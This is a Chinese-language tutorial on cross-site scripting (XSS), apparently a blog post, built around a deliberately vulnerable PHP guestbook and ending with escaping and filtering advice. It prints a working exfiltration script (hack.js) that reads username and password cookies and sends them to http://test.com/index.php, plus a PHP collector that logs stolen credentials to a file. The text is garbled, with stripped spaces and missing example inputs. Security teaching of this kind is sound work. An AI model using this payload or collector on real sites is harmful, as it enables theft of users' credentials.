跨站腳本攻擊(Cross Site script為了區別于CSS簡稱為XSS)指的是惡意攻擊者往Web頁面里插入惡意html代碼�����,當用戶瀏覽該頁之時���,嵌入其中Web里面的html代碼會被執行����,從而達到惡意用戶的特殊目的��。
當在響應頁面中返回用戶輸入的JavaScript代碼時�����,瀏覽器便會執行該代碼���。攻擊者往往利用該原理向網頁中插入惡意代碼����,并生成惡意鏈接誘使用戶點擊���。當用戶點擊該連接時���,便會生成對Web站點的請求�,其中的參數值含有惡意的JavaScript代碼���。
如果Web站點將這個參數值嵌入在響應的HTML頁面中(這正是站點問題的本質所在)�,惡意代碼便會在用戶瀏覽器中運行���,達到攻擊者的目的�����。
Web站點中所包含的腳本直接將用戶在HTML頁面中的輸入(通常是參數值)返回�����,而不預先加以清理�����。 如果腳本在響應頁面中返回由JavaScript代碼組成的輸入���,瀏覽器便可以執行此輸入��。 因此���,有可能形成指向站點的若干鏈接�,且其中一個參數包含惡意的JavaScript代碼��。 該代碼將在站點上下文中(由用戶瀏覽器)執行��,這使得該代碼有權訪問用戶在該站點中具有訪問權的cookie�,以及站點中其他可通過用戶瀏覽器訪問的窗口����。
攻擊依照下列方式繼續進行:攻擊者誘惑合法用戶單擊攻擊者生成的鏈接��。用戶單擊該鏈接時����,便會生成對于Web站點的請求����,其中的參數值含有惡意的JavaScript代碼�����。 如果Web站點將這個參數值嵌入在響應的HTML頁面中(這正是站點問題的本質所在)����,惡意代碼便會在用戶瀏覽器中運行�。
一個簡單的留言板
我們有個頁面用于允許用戶發表留言�,然后在頁面底部顯示留言列表
<!DOCTYPEhtml>
<html>
<head>
<?phpinclude('/components/headerinclude.php');?></head>
<styletype="text/css">
.comment-title{
font-size:14px;
margin:6px0px2px4px;
}
.comment-body{
font-size:14px;
color:#ccc;
font-style:italic;
border-bottom:dashed1px#ccc;
margin:4px;
}
</style>
<scripttype="text/javascript"src="/js/cookies.js"></script>
<body>
<formmethod="post"action="list.php">
<pstyle="margin:20px;">
<pstyle="font-size:16px;font-weight:bold;">YourComment</p>
<pstyle="padding:6px;">
NickName:
<br/>
<inputname="name"type="text"style="width:300px;"/>
</p>
<pstyle="padding:6px;">
Comment:
<br/>
<textareaname="comment"style="height:100px;width:300px;"></textarea>
</p>
<pstyle="padding-left:230px;">
<inputtype="submit"value="POST"style="padding:4px0px;width:80px;"/>
</p>
<pstyle="border-bottom:solid1px#fff;margin-top:10px;">
<pstyle="font-size:16px;font-weight:bold;">Comments</p>
</p>
<?php
require('/components/comments.php');
if(!empty($_POST['name'])){
addElement($_POST['name'],$_POST['comment']);
}
renderComments();
?>
</p>
</form>
</body>
</html>
addElement()方法用于添加新的留言���,而renderComments()方法用于展留言列表����,網頁看起來是這樣的�。
XSS
因為我們完全信任了用戶輸入�����,但有些別有用心的用戶會像這樣的輸入
這樣無論是誰訪問這個頁面的時候控制臺都會輸出“Hey you are a fool fish!”��,如果這只是個惡意的小玩笑�,有些人做的事情就不可愛了�,有些用戶會利用這個漏洞竊取用戶信息��、誘騙人打開惡意網站或者下載惡意程序等�。
利用xss竊取用戶名密碼
當然這個示例很簡單����,幾乎攻擊不到任何網站����,僅僅看看其原理��。我們知道很多登陸界面都有記住用戶名�、密碼的功能方便用戶下次登錄����,有些網站是直接用明文記錄用戶名�、密碼���,惡意用戶注冊賬戶登錄后使用簡單工具查看cookie結構名稱后��,如果網站有xss漏洞���,那么簡單的利用jsonp就可以獲取其它用戶的用戶名��、密碼了���。
惡意用戶會這么輸入
我們看看http://test.com/hack.js里藏了什么��?
varusername=CookieHelper.getCookie('username').value;
varpassword=CookieHelper.getCookie('password').value;
varscript=document.createElement('script');
script.src='http://test.com/index.php?username='+username+'&password='+password;
document.body.appendChild(script);
幾句簡單的javascript�����,獲取cookie中的用戶名密碼�����,利用jsonp把向http://test.com/index.php
發送了一個get請求
http://test.com/index.php
<?php
if(!empty($_GET['password'])){
$username=$_GET['username'];
$password=$_GET['password'];
$path=$_SERVER["DOCUMENT_ROOT"].'/password.txt';
$fp=fopen($path,'a');
flock($fp,LOCK_EX);
fwrite($fp,"$username\t$password\r\n");
flock($fp,LOCK_UN);
fclose($fp);
}
?>
這樣惡意用戶就把訪問留言板的用戶的信息竊取了
怎么預防
上面演示的是一個非常簡單的XSS攻擊�����,還有很多隱蔽的方式�,但是其核心都是利用了腳本注入��,因此我們解決辦法其實很簡單�����,不信賴用戶輸入���,對特殊字符如”<”,”>”轉義��,就可以從根本上防止這一問題�����,當然很多解決方案都對XSS做了特定限制��,如上面這中做法在ASP.NET中不幸不同���,微軟validateRequest對表單提交自動做了XSS驗證���。但防不勝防�,總有些聰明的惡意用戶會到我們的網站搞破壞���,對自己站點不放心可以看看這個XSS跨站測試代碼大全試試站點是否安全����。
一�、 過濾用戶輸入的內容����,檢查用戶輸入的內容中是否有非法內容�����。如<>(尖括號)��、"(引號)���、'(單引號)��、%(百分比符號)�、;(分號)�、()(括號)�����、&(&符號)�、+(加號)等���。
二�����、嚴格控制輸出
可以利用下面這些函數對出現xss漏洞的參數進行過濾
1��、htmlspecialchars()函數,用于轉義處理在頁面上顯示的文本�。
2�、htmlentities()函數,用于轉義處理在頁面上顯示的文本���。
3���、strip_tags()函數,過濾掉輸入��、輸出里面的惡意標簽���。
4�、header()函數,使用header("Content-type:application/json");用于控制json數據的頭部�,不用于瀏覽����。
5��、urlencode()函數,用于輸出處理字符型參數帶入頁面鏈接中�。
6����、intval()函數用于處理數值型參數輸出頁面中�。
7�、自定義函數,在大多情況下�����,要使用一些常用的html標簽����,以美化頁面顯示��,如留言����、小紙條�。那么在這樣的情況下��,要采用白名單的方法使用合法的標簽顯示���,過濾掉非法的字符��。
各語言示例:
PHP的htmlentities()或是htmlspecialchars()�。
Python的cgi.escape()���。
ASP的Server.HTMLEncode()���。
ASP.NET的Server.HtmlEncode() 或功能更強的 Microsoft Anti-Cross Site Scripting Library
Java的xssprotect(Open Source Library)
Node.js的node-validator�����。
